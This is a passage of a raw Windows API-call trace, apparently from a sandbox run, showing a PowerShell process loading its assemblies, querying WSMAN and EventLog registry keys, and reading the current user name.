CoTaskMemAlloc (cb=0x5a) 
returned 0x1bd970 [0135.709] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1bd970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.709] CoTaskMemFree (pv=0x1bd970) [0135.709] VirtualQuery (in: lpAddress=0xcbb60, lpBuffer=0xcca20, dwLength=0x30 | out: lpBuffer=0xcca20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.709] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x5b05c00d, Data2=0x36a9, Data3=0x4a88, Data4=([0]=0xb5, [1]=0xf9, [2]=0x88, [3]=0x1, [4]=0xb3, [5]=0x12, [6]=0x9a, [7]=0x68))) returned 0x0 [0135.709] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xef8d7228, Data2=0x3204, Data3=0x4b27, Data4=([0]=0xb3, [1]=0x15, [2]=0xea, [3]=0xf2, [4]=0x3b, [5]=0xaf, [6]=0x39, [7]=0xae))) returned 0x0 [0135.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0135.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0135.737] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0135.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0135.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0135.755] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0135.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0135.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0135.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0135.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0135.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0135.830] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.830] CoTaskMemFree (pv=0x10ccc0) [0135.831] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.831] CoTaskMemFree (pv=0x10ccc0) [0135.833] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.833] CoTaskMemFree (pv=0x10ccc0) [0135.834] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.834] CoTaskMemFree (pv=0x10ccc0) [0135.850] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", 
lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.850] CoTaskMemFree (pv=0x10ccc0) [0135.853] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.853] CoTaskMemFree (pv=0x10ccc0) [0135.854] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.854] CoTaskMemFree (pv=0x10ccc0) [0135.864] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd1dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.864] CoTaskMemFree (pv=0x0) [0135.864] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.864] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x14d180, lpcchValueName=0xcd288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.864] CoTaskMemFree (pv=0x14d180) [0135.864] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.864] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x14d180, lpcchValueName=0xcd288, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.864] CoTaskMemFree (pv=0x14d180) [0135.864] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.864] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x14d180, lpcchValueName=0xcd288, lpReserved=0x0, lpType=0x0, 
lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd288, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.864] CoTaskMemFree (pv=0x14d180) [0135.865] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd26c, lpData=0x0, lpcbData=0xcd268*=0x0 | out: lpType=0xcd26c*=0x1, lpData=0x0, lpcbData=0xcd268*=0x8) returned 0x0 [0135.865] CoTaskMemAlloc (cb=0xc) returned 0x1ce940 [0135.865] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd23c, lpData=0x1ce940, lpcbData=0xcd238*=0x8 | out: lpType=0xcd23c*=0x1, lpData="2.0", lpcbData=0xcd238*=0x8) returned 0x0 [0135.865] CoTaskMemFree (pv=0x1ce940) [0135.919] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd228 | out: phkResult=0xcd228*=0x308) returned 0x0 [0135.919] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd12c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd128*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.919] CoTaskMemFree (pv=0x0) [0135.919] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.919] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x14d180, lpcchValueName=0xcd1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.919] CoTaskMemFree (pv=0x14d180) [0135.919] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.919] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x14d180, lpcchValueName=0xcd1d8, lpReserved=0x0, 
lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.919] CoTaskMemFree (pv=0x14d180) [0135.919] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.919] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x14d180, lpcchValueName=0xcd1d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd1d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0135.919] CoTaskMemFree (pv=0x14d180) [0135.919] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd1bc, lpData=0x0, lpcbData=0xcd1b8*=0x0 | out: lpType=0xcd1bc*=0x1, lpData=0x0, lpcbData=0xcd1b8*=0x8) returned 0x0 [0135.919] CoTaskMemAlloc (cb=0xc) returned 0x1ce7a0 [0135.919] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd18c, lpData=0x1ce7a0, lpcbData=0xcd188*=0x8 | out: lpType=0xcd18c*=0x1, lpData="2.0", lpcbData=0xcd188*=0x8) returned 0x0 [0135.919] CoTaskMemFree (pv=0x1ce7a0) [0135.920] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.920] CoTaskMemFree (pv=0x10ccc0) [0135.926] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.926] CoTaskMemFree (pv=0x10ccc0) [0135.945] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x30c) returned 0x0 [0135.948] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd1cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, 
lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd1cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.948] CoTaskMemFree (pv=0x0) [0135.949] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.949] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.949] CoTaskMemFree (pv=0x14d180) [0135.949] CoTaskMemFree (pv=0x0) [0135.949] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.949] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.949] CoTaskMemFree (pv=0x14d180) [0135.949] CoTaskMemFree (pv=0x0) [0135.949] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.949] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.950] CoTaskMemFree (pv=0x14d180) [0135.950] CoTaskMemFree (pv=0x0) [0135.950] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.950] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.950] CoTaskMemFree (pv=0x14d180) [0135.950] CoTaskMemFree (pv=0x0) [0135.950] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.950] RegEnumKeyExW (in: 
hKey=0x30c, dwIndex=0x4, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.950] CoTaskMemFree (pv=0x14d180) [0135.950] CoTaskMemFree (pv=0x0) [0135.950] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.950] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.950] CoTaskMemFree (pv=0x14d180) [0135.950] CoTaskMemFree (pv=0x0) [0135.951] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.951] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.951] CoTaskMemFree (pv=0x14d180) [0135.951] CoTaskMemFree (pv=0x0) [0135.951] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.951] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.951] CoTaskMemFree (pv=0x14d180) [0135.951] CoTaskMemFree (pv=0x0) [0135.951] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0135.951] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x14d180, lpcchName=0xcd258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0135.951] CoTaskMemFree (pv=0x14d180) [0135.951] CoTaskMemFree (pv=0x0) [0135.951] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, 
samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x320) returned 0x0 [0135.951] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x330) returned 0x0 [0135.952] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x334) returned 0x0 [0135.952] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x338) returned 0x0 [0135.952] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x33c) returned 0x0 [0135.952] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.952] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x340) returned 0x0 [0135.953] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0135.953] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, 
phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x5 [0136.078] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x344) returned 0x0 [0136.078] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x0) returned 0x2 [0136.078] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x348) returned 0x0 [0136.078] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2b8 | out: phkResult=0xcd2b8*=0x34c) returned 0x0 [0136.079] RegCloseKey (hKey=0x34c) returned 0x0 [0136.079] RegCloseKey (hKey=0x30c) returned 0x0 [0136.080] RegCloseKey (hKey=0x348) returned 0x0 [0136.095] CoTaskMemAlloc (cb=0x804) returned 0x1b814640 [0136.096] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b814640, nSize=0xcd4c8 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd4c8) returned 0x1 [0136.097] CoTaskMemFree (pv=0x1b814640) [0136.098] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.098] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd508 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd508) returned 1 [0136.098] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 
| out: lpName="HardwareEvents", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.169] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.169] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.169] CoTaskMemFree (pv=0x14d180) [0136.169] CoTaskMemFree (pv=0x0) [0136.170] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd208, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.170] CoTaskMemFree (pv=0x14d180) [0136.170] CoTaskMemFree (pv=0x0) [0136.170] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.170] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x14d180, lpcchName=0xcd208, lpReserved=0x0, lpClass=0x0, 